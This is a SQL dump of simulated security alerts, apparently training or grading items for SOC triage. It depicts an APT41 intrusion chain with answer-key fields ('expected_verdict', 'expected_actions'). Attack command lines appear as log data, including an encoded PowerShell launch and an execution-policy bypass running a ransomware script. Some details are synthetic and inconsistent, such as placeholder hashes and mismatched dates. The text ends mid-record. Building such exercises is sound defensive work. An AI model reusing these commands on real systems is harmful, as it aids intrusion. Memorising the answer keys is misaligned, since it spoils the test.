(409, 'Execution of Backdoor Malware', 'high', 'Endpoint Detection and Response', 'After gaining initial access, APT41 executes a custom backdoor, allowing them to control compromised systems remotely. The malware deployment was detected via an anomaly in the execution patterns on a critical server.', 'Malware Deployment', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:01Z\",\"event_id\":\"EVT-2023-1023\",\"source_ip\":\"203.0.113.44\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin\",\"process_name\":\"svchost.exe\",\"malware_name\":\"APT41_Custom_Backdoor\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"backdoor.dll\",\"severity\":\"High\",\"action_taken\":\"Quarantine\"}', '2026-01-04 02:21:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT41 campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Critical server within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as known APT41 malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious DLL associated with backdoor activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(410, 'Establishing Persistence with Rootkit', 'high', 'Host-based Intrusion Prevention System', 'APT41 has installed a rootkit on a key server to ensure long-term access and resist detection. This activity is part of their advanced tactics to maintain persistent access within the network.', 'Persistence Mechanism', 'T1014 - Rootkit', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:46:23Z\",\"event_id\":\"HIPS-2023-5567\",\"host_ip\":\"192.168.1.10\",\"detected_action\":\"Rootkit Installation\",\"malware_name\":\"APT41_Rootkit\",\"file_path\":\"/usr/local/bin/apt41_rootkit\",\"file_hash\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"attacker_ip\":\"203.0.113.45\",\"detected_by\":\"HIPS\",\"username\":\"sysadmin\",\"additional_info\":{\"rootkit_persistence\":true,\"kernel_modification\":true}}', '2026-01-04 02:21:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known APT41 rootkit sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/apt41_rootkit\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Filename associated with APT41 rootkit persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"sysadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account with elevated privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:31:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:30:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:29:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"},{\"timestamp\":\"2026-02-01T20:28:19.015Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:46:23Z\\\",\\\"event_id\\\":\\\"HIPS-2023-5567\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"detected_action\\\":\\\"Rootkit Installation\\\",\\\"malware_name\\\":\\\"APT41_Rootkit\\\",\\\"file_path\\\":\\\"/usr/local/bin/apt41_rootkit\\\",\\\"file_hash\\\":\\\"3a5f1d7b8ee1b9c3c0a8a9c512345678\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"detected_by\\\":\\\"HIPS\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"additional_info\\\":{\\\"rootkit_persistence\\\":true,\\\"kernel_modification\\\":true}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(411, 'Lateral Movement to PII Databases', 'critical', 'Security Information and Event Management', 'APT41 has successfully utilized harvested credentials to move laterally within the network, specifically targeting databases containing PII.', 'Credential Dumping', 'T1003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:47Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"compromised_user\",\"action\":\"lateral_movement\",\"tool\":\"Mimikatz\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"mimilib.dll\",\"event_description\":\"Failed login attempt detected on database server with potential credential dumping activity.\",\"additional_info\":{\"failed_logins\":5,\"successful_logins\":1,\"target_database\":\"PII_DB_01\"}}', '2026-01-04 02:21:52', '2026-02-17 05:23:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal database server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory Logs\",\"verdict\":\"suspicious\",\"details\":\"Account recently accessed from multiple foreign IPs.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimilib.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used by Mimikatz for credential dumping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.016Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:47Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"lateral_movement\\\",\\\"tool\\\":\\\"Mimikatz\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimilib.dll\\\",\\\"event_description\\\":\\\"Failed login attempt detected on database server with potential credential dumping activity.\\\",\\\"additional_info\\\":{\\\"failed_logins\\\":5,\\\"successful_logins\\\":1,\\\"target_database\\\":\\\"PII_DB_01\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(412, 'Exfiltration of Game Source Code and PII', 'critical', 'Data Loss Prevention', 'APT41 successfully exfiltrated sensitive game source code and PII. This marks the completion of their dual-mode operation focused on both commercial and strategic gains.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"EXFIL-2023-5276\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"action\":\"ALLOW\",\"protocol\":\"HTTPS\",\"file_name\":\"game_source_code_v1.0.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"url\":\"https://malicious-domain.com/upload\",\"data_volume\":\"15GB\",\"comments\":\"Data exfiltration detected via secured channel; source code and PII files identified.\"}', '2026-01-04 02:21:52', '2026-02-17 22:37:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Malicious file associated with APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"game_source_code_v1.0.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Exfiltrated file containing sensitive game source code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.017Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-5276\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"game_source_code_v1.0.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"url\\\":\\\"https://malicious-domain.com/upload\\\",\\\"data_volume\\\":\\\"15GB\\\",\\\"comments\\\":\\\"Data exfiltration detected via secured channel; source code and PII files identified.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(413, 'Supply Chain Compromise Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Anomalous network activity detected indicating a potential supply chain compromise. The malicious code was inserted into a popular software update by APT41, exploiting the company\'s reliance on the software to gain a foothold in the network.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"update_v1.23.4.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"NIDS-20231015-0001\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious software update used in supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_v1.23.4.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Filename associated with malicious software update distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(414, 'Suspicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'After gaining access, the attackers deployed a suspicious script to execute a ransomware payload, aiming to encrypt critical business data and demand a ransom. The script was detected running on a critical server.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"edr-20231015-0001\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"script_name\":\"encryptor_v2.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"process_id\":4521,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\j.doe\\\\Desktop\\\\encryptor_v2.ps1\",\"detected_by\":\"EDR\",\"external_ip\":\"203.0.113.45\",\"malware_family\":\"APT41\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encryptor_v2.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized script executed on high-value server\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 